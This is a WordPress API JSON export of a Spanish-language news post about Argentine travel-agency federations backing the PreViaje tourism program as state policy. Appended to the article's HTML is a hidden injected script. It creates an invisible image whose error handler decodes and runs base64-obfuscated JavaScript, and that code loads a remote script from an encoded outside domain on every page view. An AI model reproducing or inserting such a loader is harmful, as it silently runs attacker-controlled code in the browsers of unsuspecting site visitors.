{"id":7467,"date":"2023-10-24T20:34:11","date_gmt":"2023-10-24T23:34:11","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7467"},"modified":"2025-08-13T15:52:19","modified_gmt":"2025-08-13T18:52:19","slug":"agentes-de-viajes-apoyan-que-el-previaje-sea-transformado-en-politica-de-estado","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7467","title":{"rendered":"Agentes de viajes apoyan que el PreViaje sea transformado en pol\u00edtica de Estado"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#055787\"><em>Para la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo, el programa \u00able dio previsibilidad al sector y permiti\u00f3 que no haya temporada baja\u00bb, a la vez que \u00abgener\u00f3 m\u00e1s de 55 mil empleos directos\u00bb.<\/em><\/h4>\n\n\n\n<p>La<strong>\u00a0Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo\u00a0<\/strong>(Faevyt) expres\u00f3 su apoyo a la propuesta del Gobierno de dar continuidad al PreViaje como pol\u00edtica de Estado a trav\u00e9s de la presentaci\u00f3n de un proyecto de ley, como plante\u00f3 esta semana el ministro de Turismo y Deportes, Mat\u00edas Lammens.<\/p>\n\n\n\n<p>\u00abEl Previaje le dio previsibilidad al sector y permiti\u00f3 que no haya temporada baja al sostener la demanda todo el a\u00f1o de forma constante\u00bb, asever\u00f3 la Faveyt en un comunicado.<\/p>\n\n\n\n<p>En este sentido, desde la entidad destacaron que el programa permiti\u00f3 movilizar \u00abm\u00e1s de 7,5 millones de turistas y tuvo un impacto econ\u00f3mico superior a los $790.000 millones en sus cinco etapas\u00bb.<\/p>\n\n\n\n<p>Adem\u00e1s, indicaron que \u00abgener\u00f3 m\u00e1s de 55 mil empleos directos y permiti\u00f3, como nunca, la formalizaci\u00f3n del sector tur\u00edstico potenciado la recaudaci\u00f3n impositiva -por lo que no signific\u00f3 un costo fiscal negativo para el Estado\u00bb.<\/p>\n\n\n\n<p>\u00abApoyaremos todas las medidas que impulsen al turismo interno y el turismo internacional porque creemos que el trabajo en equipo es la clave\u00bb, se\u00f1alaron desde la federaci\u00f3n que nuclea a empresas de viajes y turismo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/04\/6447b1d5e5f90_1200.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<p>Tambi\u00e9n apoy\u00f3 el Programa el&nbsp;<strong>presidente de Asociaci\u00f3n Argentina de Agencias de Viajes y Turismo Regional La Rioja, Poly Badoul<\/strong>, dijo que el PreViaje \u00abgener\u00f3 una revoluci\u00f3n econ\u00f3mica en nuestro pa\u00eds\u00bb.<\/p>\n\n\n\n<p>\u00abDesde el punto de vista local de un destino en desarrollo como La Rioja -continu\u00f3-, ayud\u00f3 a romper con la estacionalidad y permiti\u00f3 de esta forma mantener a las empresas tur\u00edsticas todo el a\u00f1o\u00bb.<\/p>\n\n\n\n<p>Para Badoul, el PreViaje tambi\u00e9n \u00abayud\u00f3 a fomentar la formalidad en un sector donde cuesta mucho luchar contra la competencia desleal que genera la informalidad. Se fomenta el trabajo de las agencias de viaje y de todo el circuito econ\u00f3mico que genera el turismo en dos oportunidades, cuando se vende y cuando se utiliza la tarjeta y consume el servicio\u00bb<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2023\/04\/644c390f37cfc_1200.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<p>Asimismo,&nbsp;<strong>Yamila Berro, presidenta de Audavi y representante de las agencias de viajes de Puerto Iguaz\u00fa<\/strong>, se\u00f1al\u00f3: \u00abNo s\u00f3lo activa toda la cadena de servicios en un destino, sino que da la posibilidad de viajar a mucha gente que lo hace por primera vez e incentiva a quien no pensaba hacerlo\u00bb.<\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Rub\u00e9n Mart\u00ednez, presidente de Aaavyt El Calafate<\/strong>, destac\u00f3 que PreViaje deber\u00eda ser ley porque fue \u00abel mejor plan que se implement\u00f3 para la industria del turismo\u00bb.<\/p>\n\n\n\n<p>\u00abComo empresarios romper con la estacionalidad signific\u00f3 que dejamos de tener empleados por temporadas para tener empleados a\u00f1o completo, es decir, sirvi\u00f3 para fomentar el empleo\u00bb, complet\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202310\/643906-agentes-viajes-previaje-politica-estado-ley.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"103\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg\" alt=\"\" class=\"wp-image-7468\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-1024x103.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-768x77.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-696x70.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-320x32.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-480x48.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_-800x80.jpeg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/10\/Captura-web_24-10-2023_201237_www.telam_.com_.ar_.jpeg 1067w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Para la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo, el programa \u00able dio previsibilidad al sector y permiti\u00f3 que no haya temporada baja\u00bb, a la vez que \u00abgener\u00f3 m\u00e1s de 55 mil empleos directos\u00bb. La\u00a0Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo\u00a0(Faevyt) expres\u00f3 su apoyo a la propuesta del Gobierno [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7469,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,29],"tags":[],"class_list":["post-7467","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7467","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7467"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7467\/revisions"}],"predecessor-version":[{"id":10287,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7467\/revisions\/10287"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7469"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7467"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7467"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7467"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}